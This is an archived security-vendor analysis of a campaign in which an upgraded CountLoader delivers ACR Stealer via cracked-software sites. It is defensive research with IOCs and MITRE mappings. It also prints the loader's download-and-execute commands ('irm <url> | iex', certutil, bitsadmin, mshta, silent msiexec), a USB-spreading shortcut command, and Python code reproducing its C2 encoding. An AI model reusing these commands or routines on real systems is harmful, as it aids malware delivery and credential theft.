{
	"id": "63de3416-34eb-4766-8a14-69a3b0f99ce0",
	"created_at": "2026-04-06T00:19:42.68571Z",
	"updated_at": "2026-04-10T13:12:18.042538Z",
	"deleted_at": null,
	"sha1_hash": "2884aad90131c3813c517d71f7cc275052c7d121",
	"title": "From Loader to Looter: ACR Stealer Rides on Upgraded CountLoader",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2468389,
	"plain_text": "From Loader to Looter: ACR Stealer Rides on Upgraded\r\nCountLoader\r\nBy Rahul Ramesh\r\nPublished: 2025-12-18 · Archived: 2026-04-02 11:41:54 UTC\r\nKey Findings\r\nThe Howler Cell Threat Intelligence team has uncovered a new malware campaign leveraging cracked software\r\ndistribution sites to deploy an upgraded variant of CountLoader. Below are the key findings:\r\nCampaign Overview:\r\nMalware distributed via cracked software sites.\r\nUses CountLoader as the initial tool in a multistage attack for access, evasion, and delivery of\r\nadditional malware families.\r\nHistorical Context:\r\nJune 11, 2025: Kaspersky reported DeepSeek-themed operation using PowerShell loader.\r\nSeptember 18, 2025: SilentPush disclosed active CountLoader development across JScript, .NET,\r\nand PowerShell variants.\r\nEarlier analyses documented six functional actions.\r\nNew Variant Details (CountLoader v3.2):\r\nExpanded capabilities: nine task types (up from six).\r\nThree new features:\r\nPayload propagation via removable media/USB devices.\r\nDirect memory payload execution using Mshta and PowerShell.\r\nInfection Flow:\r\nStarts with malicious archive containing trojanized Python library.\r\nExecutes obfuscated HTA script via MSHTA.\r\nEstablishes persistence through scheduled tasks.\r\nPerforms host reconnaissance and communicates with C2 using XOR + Base64 encoding.\r\nCommand and Control (C2):\r\nValidates active infrastructure and retrieves JWT token.\r\nRequests task instructions, including downloading executables, ZIP archives, DLLs, MSI installers,\r\nand running PowerShell payloads.\r\nThis campaign highlights CountLoader’s ongoing evolution and increased sophistication, reinforcing the need for\r\nproactive detection and layered defense strategies.\r\nHowler Cell's Observation \r\nhttps://www.cyderes.com/howler-cell/acr-stealer-rides-on-upgraded-countloader\r\nPage 1 of 18\n\nThis campaign ultimately delivers ACR Stealer, a credential stealing malware. The final payload is a trojanized\r\nbuild of the legitimate signed WinX_DVD_Pro.exe, modified to execute a shellcode loader in memory. The\r\nloader decrypts and unpacks ACR Stealer without touching disk.\r\nHowler Cell also identified related malicious Python packages uploaded as early as September 2025, all with zero\r\nAntivirus detections at the time.\r\nAttack Overview\r\nFigure 1: Attack overview\r\nTechnical Analysis \r\nHowler Cell Reverse Engineering (RE) Team identified and traced a malware campaign likely propagated via\r\ndownload pages on websites distributing cracked versions of legitimate software, including Microsoft Office as\r\nshown in Figure 2.\r\nFigure 2: Facebook post of user seeking help from an unknown malware infection\r\nhttps://www.cyderes.com/howler-cell/acr-stealer-rides-on-upgraded-countloader\r\nPage 2 of 18\n\nAfter the user clicks the fake download prompt, the site redirects them to a MediaFire link that hosts a malicious\r\narchive. The archive contains two items: an encrypted ZIP file and a .docx file that contains the password needed\r\nto open the ZIP.\r\nFigure 3: Overview of extracted archive\r\nhttps://www.cyderes.com/howler-cell/acr-stealer-rides-on-upgraded-countloader\r\nPage 3 of 18\n\nFigure 3 depicts the contents of the archive. Setup.exe is a renamed legitimate Python interpreter. Typically, we\r\nobserve python interpreters (python.exe) being abused to sideload its dependent DLL, python3\u003cx\u003e.dll for\r\nmalicious delivery. However, in this case all executables and DLLs are legitimate signed components.\r\nNotably as shown in Figure 4, one library file has been modified to execute a malicious MSHTA command,\r\nwhich is automatically loaded when Setup.exe runs, ultimately leading to the execution of the MSHTA.\r\nFigure 4: Modified library script\r\nUpon execution, MSHTA retrieves and runs an obfuscated variant of the CountLoader v3.2 (see Figure 5 for\r\nsnippet). \r\nFigure 5: Updated version of CountLoader\r\nCountLoader\r\nhttps://www.cyderes.com/howler-cell/acr-stealer-rides-on-upgraded-countloader\r\nPage 4 of 18\n\nSha256: eac4f6a197b4a738c2294419fda97958b45faee3475b70b6ce113348b73eab3b\r\nThe script contains a list of encoded strings that are dynamically decoded using a custom function. We have\r\nreplicated this decoding routine in Python and replaced all instances of encoded string with decoded plain text\r\nwithin the HTA script for our analysis.  The python routine to decode the string is presented in Table 1. \r\nTable 1: CountLoader's string decoding routine\r\ndef decode_strings(encoded_lists , key_multiplier=39, key_offset=150):\r\n decoded_output = []\r\n for list_index, encoded_list in enumerate(encoded_lists):\r\n decoded_string = \"\"\r\n for char_index, char_value in enumerate(encoded_list):\r\n key = (char_index * key_multiplier + key_offset) \u0026 255\r\n decoded_string += chr(char_value ^ key)\r\n decoded_output.append(decoded_string)\r\n return decoded_output\r\nCountLoader starts its execution by self-deleting its own HTA file from disk and constructs the initial handshake\r\npayload to communicate with the command-and-control (C2) server. Before diving into the handshake process,\r\nit’s important to first examine the custom encoding and decoding routines implemented by the Loader.\r\nCommunication Routines\r\nThe CountLoader client (HTA script) and its command-and-control (C2) server use a custom encoding/decoding\r\nroutine to exchange data and conceal the actual content being transmitted. To analyze and emulate CountLoader’s\r\nC2 mechanism, we implemented both the encoding and decoding routines in Python, as detailed in Table 2.\r\nTable 2: Functions used to communicate with CountLoader's C2\r\ndef CL_encode_data(plaintext):\r\n key = \"\".join(random.choice(\"0123456789\") for _ in range(6))\r\n key_bytes = [ord(c) for c in key]\r\n xored = \"\".join(chr(ord(ch) ^ key_bytes[i % len(key_bytes)]) for i, ch in enumerate(plaintext))\r\nhttps://www.cyderes.com/howler-cell/acr-stealer-rides-on-upgraded-countloader\r\nPage 5 of 18\n\npacked = bytearray()\r\nfor ch in xored:\r\n code = ord(ch)\r\n packed.append(code \u0026 0xFF)\r\n packed.append((code \u003e\u003e 8) \u0026 0xFF)\r\n blob = base64.b64encode(bytes(packed)).decode(\"ascii\")\r\n return key + blob\r\ndef CL_decode_data(s):\r\n key = s[:6].encode(\"ascii\")\r\n b64 = s[6:]\r\n missing_padding = len(b64) % 4\r\n if missing_padding:\r\n b64 += \"=\" * (4 - missing_padding)\r\n data = base64.b64decode(b64, validate=False)\r\n out = bytearray(len(data))\r\n klen = len(key)\r\n for i, b in enumerate(data):\r\n out[i] = b ^ key[i % klen]\r\n return out.decode(\"utf-8\")\r\nIn short, a random six-digit key is generated and used as an XOR key to encode the Base64 representation of the\r\nplaintext. This key is then prepended to the encoded data blob before being transmitted for communication.\r\nInitial C2 Status Check\r\nFigure 6: Initial C2 status identification\r\nhttps://www.cyderes.com/howler-cell/acr-stealer-rides-on-upgraded-countloader\r\nPage 6 of 18\n\nThe script identifies an active C2 by sending POST requests to domains in the format globalsnn{i}-new[.]cc,\r\nwhere i ranges from 0 to 10 as seen from code snippet in Figure 6. The HTA client includes the message\r\ncheckStatus in the POST body and expects a response containing success. As visualized in Figure 7, messages\r\nare transmitted using the custom encoding routine (CL_encode_data) and decoded with (CL_decode_data) to\r\nreveal the plaintext.\r\nFigure 7: Active C2 identification\r\nExfiltrate Host Information \u0026 Obtain JWT Token\r\nAfter successfully identifying the active C2 server, CountLoader proceeds to gather the following details listed\r\nunder Table 3, from the host system.\r\nTable 3: Host information collected\r\nQuery\r\nkey\r\nValue (as sent) Behavior\r\nhwid\r\nMD5 of OS_string +\r\nComputerName\\Username\r\n[+UserSID] (uppercased)\r\nWMI: Win32_OperatingSystem (Caption, Version),\r\nWScript.Network (ComputerName, UserName),\r\nWin32_Account (SID) \r\nbuildId newSide Constant: newSide\r\nos OS caption + architecture\r\nWMI: SELECT Caption, Version, ProductType FROM\r\nWin32_OperatingSystem; Env:\r\nPROCESSOR_ARCHITECTURE \r\nhttps://www.cyderes.com/howler-cell/acr-stealer-rides-on-upgraded-countloader\r\nPage 7 of 18\n\nQuery\r\nkey\r\nValue (as sent) Behavior\r\nav\r\nComma-separated AV product\r\ndisplay names or 'Not found'\r\nWMI: root\\SecurityCenter2 -\u003e AntiVirusProduct\r\n(SELECT displayName) \r\nusername\r\nComputerName\\Username with\r\noptional ' *' suffix\r\nWScript.Network (ComputerName, UserName) \r\ncorp true / false\r\nWMI: SELECT PartOfDomain FROM\r\nWin32_ComputerSystem \r\ndomain\r\nDomain name(s) (comma-separated)\r\nor empty\r\nWMI: SELECT Domain FROM\r\nWin32_ComputerSystem \r\nversion 3.2  Constant: 3.2 \r\nledger true / false\r\nChecks folder existence in paths: %ProgramFiles%,\r\n%ProgramData%, %LOCALAPPDATA%,\r\n%APPDATA% for 'Ledger Live'\r\nwallets true / false\r\nChecks %APPDATA% for folders: @trezor, atomic,\r\nExodus, Guarda, KeepKey, BitBox02\r\nOnce the above information is collected, the data is formatted in a single message as shown in Figure 8.\r\nFigure 8: Host information sent to C2\r\nCL_encode_data(connect?hwid=\u003cMD5\u003e\u0026buildId=newSide\u0026os=\u003cOS\u003e\u0026av=\u003cAV_List\u003e\u0026username=\u003cComputer\\User[*]\u003e\u0026corp=\u003ctrue|f\r\nOn successfully receiving the initial host information, CountLoader C2 server issues a unique JWT token (Figure\r\n9) tied to the submitted HWID. This token is then used to authenticate all subsequent communications with the\r\nC2.\r\nFigure 9: Encoded JWT returned by C2\r\nhttps://www.cyderes.com/howler-cell/acr-stealer-rides-on-upgraded-countloader\r\nPage 8 of 18\n\nPersistence\r\nCountLoader creates persistence using Scheduled Task with name \"GoogleTaskSystem136.0.7023.12\" + \u003cGUID-like string\u003e as seen from code snippet in Figure 10.\r\nFigure 10: Persistence using scheduled task\r\nThe Task is scheduled to run every 30 minutes for 10 years, invoking Mshta with fallback domain:\r\nhxxps[://]alphazero1-endscape[.]cc as a parameter passed to it.\r\nThe loader also verifies (Figure 11) whether CrowdStrike Falcon service is active by querying the antivirus list\r\nvia WMI. If Falcon service is detected, it sets the persistence command to run as:\r\ncmd.exe /c start /b mshta.exe \u003cURL\u003e\r\nOtherwise, it uses:\r\nhttps://www.cyderes.com/howler-cell/acr-stealer-rides-on-upgraded-countloader\r\nPage 9 of 18\n\nmshta.exe \u003cURL\u003e\r\nFigure 11: Persistence check for CrowdStrike Falcon service\r\nFetching Tasks from C2\r\nAfter establishing persistence, CountLoader issues a POST request to its C2 server to retrieve task details (Table\r\n4). The request body must include the string getUpdates (encoded using CL_encode_data), and the Authorization\r\nheader must contain the previously obtained JWT as a Bearer token.\r\nWe successfully emulated CountLoader’s C2 communication in a controlled Safe-Box environment, and the\r\nserver responded with the following task detail.\r\nTable 4 Task Details as returned by C2 (response decoded using CL_decode_data routine)\r\n[\r\n {\r\n \"id\": 20,\r\n \"url\": \"hxxps[://]globalsnn2-new[.]cc/WinX_DVD_Copy_Pro.zip\",\r\n \"taskType\": 2\r\n }\r\n]\r\nCountLoader: Supported Task Types\r\nAs seen from the response above, CountLoader supports multiple Task Type’s, and each type is detailed under\r\nTable 5.\r\nTable 5: CountLoader supported task types\r\nhttps://www.cyderes.com/howler-cell/acr-stealer-rides-on-upgraded-countloader\r\nPage 10 of 18\n\nTask\r\ntype\r\nWhat it does Command(s) executed\r\n1\r\nDownloads an executable from the\r\nprovided URL, saves it under the\r\ncurrent user's profile directory, and\r\nexecutes it (optionally with\r\narguments if the URL includes a\r\ncomma-separated suffix).\r\nIt supports multiple redundant download mechanisms which\r\nare used one after the other if one fails. These are also\r\nleveraged for Task Types 2, 3, and 6 to retrieve payloads.\r\ncurl.exe: curl.exe -k -o \"\u003cout\u003e\" \"\u003curl\u003e\"\r\nbitsadmin.exe: bitsadmin.exe /transfer \"\u003cjob\u003e\"\r\n/download /priority foreground \"\u003curl\u003e\" \"\u003cout\u003e\"\r\ncertutil.exe: certutil.exe -urlcache -split -f \"\u003curl\u003e\" \"\r\n\u003cout\u003e\"\r\nPowerShell Invoke-RestMethod (IRM):\r\npowershell.exe -Command \"irm \u003curl\u003e | iex\"\r\nVBScript via MSScriptControl\r\n(MSXML2.XMLHTTP + ADODB.Stream):\r\nDownloadToFile \"\u003curl\u003e\", \"\u003cout\u003e\"\r\nActiveX MSXML2.XMLHTTP + ADODB.Stream:\r\nHTTP GET request → SaveToFile \"\u003cout\u003e\"\r\nActiveX WinHttp.WinHttpRequest.5.1 +\r\nADODB.Stream: HTTP GET request → SaveToFile \"\r\n\u003cout\u003e\"\r\n2\r\nFetches a ZIP archive from the\r\nURL, stores it under the user's\r\nprofile, extracts it to a folder\r\nnamed after the ZIP base, then\r\nlaunches either a Python-based\r\nmodule (pythontest.exe run.py) if\r\npresent or a EXE included in that\r\nfolder. \r\n pythontest.exe \"\u003cUserProfile\u003e\\folder\\run.py\"\r\nor\r\n\u003cUserProfile\u003e\\folder\\folder.exe \r\n3\r\nDownloads a DLL from the URL\r\nto the user's profile and runs it via\r\nrundll32 using an export name\r\nsupplied alongside the URL\r\n(comma separated). \r\nrundll32 \"\u003cUserProfile\u003e\\module.dll”, \u003cExportName\u003e\r\nhttps://www.cyderes.com/howler-cell/acr-stealer-rides-on-upgraded-countloader\r\nPage 11 of 18\n\nTask\r\ntype\r\nWhat it does Command(s) executed\r\n4\r\nRemoves a specific scheduled task\r\nused by the Loader.\r\nTargets a task named like\r\nGoogleUpdaterTaskSystem136.1.7023.12{GUID} and (uses\r\nWindows Task Scheduler COM APIs to delete)\r\n5\r\nCollects and exfiltrates extensive\r\nsystem/domain reconnaissance\r\n(computer role, domain/forest data,\r\ncurrent user group memberships,\r\nDomain Admins members, domain\r\ncomputers).\r\nPosts the collected information to C2 tagging it with the task's\r\nid.\r\n6\r\nDownloads an MSI installer and\r\nperforms a silent install under the\r\ncurrent user context.\r\nmsiexec.exe /i \"\u003cUserProfile\u003e\\package.msi\" /quiet /qn\r\n9\r\nPropagates via removable media by\r\ncreating malicious LNK shortcuts\r\nnext to hidden originals; the\r\nshortcut executes the original file\r\nand then launches the malware via\r\nmshta with a C2 parameter.\r\ncmd.exe /c start \"\" .\\original_filename \u0026 start \"\" mshta \"\r\n\u003cC2_parameter\u003e\"\r\n10\r\nDirectly launches MSHTA against\r\na provided remote URL\r\nmshta.exe \u003curl\u003e\r\n11\r\nExecutes a remote PowerShell\r\npayload by downloading and in-memory executing it via Invoke-RestMethod piping to Invoke-Expression.\r\npowershell.exe -Command \"irm \u003curl\u003e | iex\"\r\nAcknowledgment\r\nhttps://www.cyderes.com/howler-cell/acr-stealer-rides-on-upgraded-countloader\r\nPage 12 of 18\n\nTo signify that a task is complete, the malware sends an acknowledgment using POST request back to its C2 using\r\nthe endpoint:\r\napproveUpdate?id=\u003ctaskId\u003e\r\nThis request includes the Authorization header with the previously obtained JWT token. The acknowledgment is\r\nsent for all task types except for types 4 and 5.\r\nThis version of the loader includes a capability to send acknowledgments for intermediate or failed states using\r\nthe setStatus?id=\u003ctaskId\u003e\u0026status=\u003cvalue\u003e endpoint. However, this function is never invoked in the current\r\nscript, which likely indicates that the feature is still under development or being tested.\r\nFinal Payload - ACR Stealer\r\nReferring to the server response (Table‑4), it’s evident that the ZIP file would be downloaded, extracted, and its\r\npayload executed. Upon successful execution, an acknowledgment is sent back to the server.\r\nWith the C2 still active, we were able to retrieve the final payload, WinX_DVD_Copy_Pro.zip, and the following\r\nanalysis was performed.\r\nSha256: d261394ea0012f6eaddc21a2091db8a7d982d919f18d3ee6962dc4bb935d5759\r\nUpon extraction, the ZIP contains a single 32-bit executable named WinX_DVD_Copy_Pro.exe with an invalid\r\ndigital signature. During analysis, we identified a legitimate, valid signed version of WinX_DVD_Pro.exe and\r\ncompared it (Figure 12) with the file inside the archive. The malicious variant is a modified copy of the legitimate\r\nbinary, altered to hijack a random function in its control flow and execute a custom shellcode loader.\r\nFigure 12: Legitimate binary modified to execute shellcode\r\nThe shellcode loader dynamically allocates memory and maps an additional shellcode that is appended to the end\r\nof the modified binary. This shellcode loader contains a large amount of junk instructions and function calls, as\r\nillustrated in Figure 13.\r\nFigure 13: Junk instructions within shellcode loader\r\nhttps://www.cyderes.com/howler-cell/acr-stealer-rides-on-upgraded-countloader\r\nPage 13 of 18\n\nAs visualized in Figure 14, the transfer to the next stage shellcode is done through an indirect jump (JMP EAX)\r\ninstruction.\r\nFigure 14: Transfer execution to next stage shellcode\r\nThe next-stage shellcode employs self-modifying technique, where the initial 0x3BB bytes are dedicated to\r\ndecrypting the remaining code before transferring execution to it. The shellcode employs stack strings,\r\nhttps://www.cyderes.com/howler-cell/acr-stealer-rides-on-upgraded-countloader\r\nPage 14 of 18\n\ndynamically resolves Win32 API function pointers, and uses an indirect jump to transfer execution. Its primary\r\nrole is to unpack the final payload (Figure 15) directly in memory and then hand off execution to it.\r\nFigure 15: Final payload - ACR stealer\r\nBased on comprehensive public reports and our own analysis, we attribute the final stealer to ACR Stealer. In\r\nTable 6, we provide C2 addresses, campaign ID and build date of the unpacked stealer.\r\nTable 6 Final Payload - ACR Stealer Config\r\nC2: 45[.]154[.]58[.]190 Campaign ID: 08de29ba-2323-4035-8191-1e044f4c6fb4 Build date: Mon Nov 17\r\n22:44:43 2025\r\nLooking for similar payloads\r\nHowler cell RE team analyzed the payloads and searched for similar samples on VirusTotal. We found multiple\r\ntrojanized Python library files uploaded as early as September 2025, with zero detections (Figure 16).\r\nFigure 16 Malicious files with 0 detections in Virustotal [requires login]\r\nThe C2 domains extracted from the identified payloads are listed under Table 7.\r\nTable 7 Recent CountLoader C2's\r\nhttps://www.cyderes.com/howler-cell/acr-stealer-rides-on-upgraded-countloader\r\nPage 15 of 18\n\nIP C2 Domain Country ISP\r\n172[.]67[.]173[.]229 ms-team-ping1[.]com N/A CLOUDFLARENET\r\n31[.]59[.]139[.]111 globalsnn1-new[.]cc United States Cgi Global Limited\r\n104[.]21[.]91[.]144 s1-rarlab[.]com N/A CLOUDFLARENET\r\n94[.]183[.]183[.]52 my-smart-house1[.]com United States Cgi Global Limited\r\n104[.]21[.]9[.]208 bucket-aws-s1[.]com N/A CLOUDFLARENET\r\n31[.]59[.]139[.]111 polystore9-servicebucket[.]cc United States Cgi Global Limited\r\n94[.]183[.]185[.]142 microservice-update-s1-bucket[.]cc United States Cgi Global Limited\r\nThe C2 infrastructure uses domains that impersonate legitimate services and is fronted by CLOUDFLARENET\r\n(ASN 13335) alongside hosting attributed to Cgi Global Limited (ASN 56971) with U.S. geolocation, indicating\r\nattempts to blend with normal enterprise traffic.\r\nAS56971 is a Hong Kong‑registered hosting ASN operated by CGI GLOBAL LIMITED (associated with\r\nhostvds[.]com), appears to be the most frequently used backend across this set, consistent with commodity VPS\r\nranges that support rapid setup/tear‑down and complicate attribution and takedown.\r\nConclusion\r\nThe investigation confirms that CountLoader has evolved into a highly modular and stealthy loader capable of\r\ndynamic task execution and sophisticated persistence mechanisms. Its ability to deliver ACR Stealer through a\r\nmulti-stage process starting from Python library tampering to in-memory shellcode unpacking highlights a\r\ngrowing trend of signed binary abuse and fileless execution tactics.\r\nThe presence of dormant features like setStatus indicates ongoing development aimed at improving operational\r\ncontrol and resilience. Organizations should prioritize detection of LOLBins such as PowerShell, Mshta,\r\nCertutil, and Bitsadmin, monitor scheduled task anomalies, and enforce strict controls on script execution. This\r\ncampaign underscores the importance of layered defenses, threat intelligence integration, and proactive hunting to\r\nmitigate advanced loader-based attacks that pivot into credential theft and data exfiltration.\r\nhttps://www.cyderes.com/howler-cell/acr-stealer-rides-on-upgraded-countloader\r\nPage 16 of 18\n\nAppendix\r\nMITRE Coverage\r\nInitial Access:\r\n T1204.001 - User Execution: Malicious Link\r\n T1204.002  - User Execution: Malicious File\r\nExecution:\r\nT1047 - Windows Management Instrumentation\r\nT1059.001 - Command and Scripting Interpreter: PowerShell\r\nPersistence:\r\nT1053.005 - Scheduled Task/Job: Scheduled Task\r\nDefense Evasion:\r\nT1218.005 - System Binary Proxy Execution: Mshta\r\nT1218.007 - System Binary Proxy Execution: Msiexec\r\nT1218.011 - System Binary Proxy Execution: Rundll32\r\nT1197 - BITS Jobs\r\nDiscovery:\r\nT1518.001 - Software Discovery: Security Software Discovery\r\nT1087.002 - Account Discovery: Domain Account\r\nT1069.002 - Permission Groups Discovery: Domain Groups\r\nT1482 - Domain Trust Discovery\r\nCommand and Control:\r\nT1071.001 - Application Layer Protocol: Web Protocols\r\nT1132.001 - Data Encoding: Standard Encoding\r\nT1132.002 - Data Encoding: Non-Standard Encoding\r\nLateral Movement:\r\nT1091 - Replication Through Removable Media\r\nExfiltration:\r\nT1041 - Exfiltration Over C2 Channel\r\nIOC's\r\n5cfde2ce325e868bf9f3ea9608357d2a2df303c99be304d166bdf66f0d48d58e\r\nhttps://www.cyderes.com/howler-cell/acr-stealer-rides-on-upgraded-countloader\r\nPage 17 of 18\n\n0fa42bbd3b92236bc5e2d26f32fc5b8d7c8aaa0f157e3960e4ffa19491292945\r\n8403d3d2955b141b84fe81dff046f0f355cc7185afc5ad7ae16706248fed3567\r\nfd2d1ce509c558fa3abc0216530e8ebf1a7a9d7adab41df856b06dc80a4650f0\r\na220e348e4027846ee8e8c36b94b5d20a05aa11c18e659e44897d39c57444681\r\n99340600db5fd3355a3d7ba9e243b65630d928e70afbfb401bce4e16d194e22a\r\nb8805ac976918b1104750a09891336c7e6246426b8193f54f2847aee8cd96c68\r\nbb4811f14f3c42f6a62106ab2fcd0510cb6c97bb5cbd0a35640fcdb29b358530\r\n91efc7f56e7f8246d34e7d126c4f4cf71a1a5de977a4ba9097531a59e72bb68d\r\neac4f6a197b4a738c2294419fda97958b45faee3475b70b6ce113348b73eab3b\r\nd261394ea0012f6eaddc21a2091db8a7d982d919f18d3ee6962dc4bb935d5759\r\ne12e905d683de75543238312b44f3f69707e1a16bc40aa2d14048a8101ce49b8\r\nC2's\r\n45[.]154[.]58[.]190\r\nglobalsnn2-new[.]cc\r\nms-team-ping7[.]com\r\nglobalsnn3-new[.]cc\r\nglobalsnn1-new[.]cc\r\ns1-rarlab[.]com\r\nmy-smart-house1[.]com\r\nbucket-aws-s1[.]com\r\nalphazero1-endscape[.]cc\r\npolystore9-servicebucket[.]cc\r\nmicroservice-update-s1-bucket[.]cc\r\nReferences\r\nhttps://www.silentpush.com/blog/countloader/\r\nhttps://securelist.com/browservenom-mimicks-deepseek-to-use-malicious-proxy/115728/\r\nhttps://www.linkedin.com/posts/teethador_tdr-threat-brief-acreed-activity-7384201370855165952-vHAW/\r\nBack to Top\r\nSource: https://www.cyderes.com/howler-cell/acr-stealer-rides-on-upgraded-countloader\r\nhttps://www.cyderes.com/howler-cell/acr-stealer-rides-on-upgraded-countloader\r\nPage 18 of 18",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.cyderes.com/howler-cell/acr-stealer-rides-on-upgraded-countloader"
	],
	"report_names": [
		"acr-stealer-rides-on-upgraded-countloader"
	],
	"threat_actors": [],
	"ts_created_at": 1775434782,
	"ts_updated_at": 1775826738,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2884aad90131c3813c517d71f7cc275052c7d121.pdf",
		"text": "https://archive.orkl.eu/2884aad90131c3813c517d71f7cc275052c7d121.txt",
		"img": "https://archive.orkl.eu/2884aad90131c3813c517d71f7cc275052c7d121.jpg"
	}
}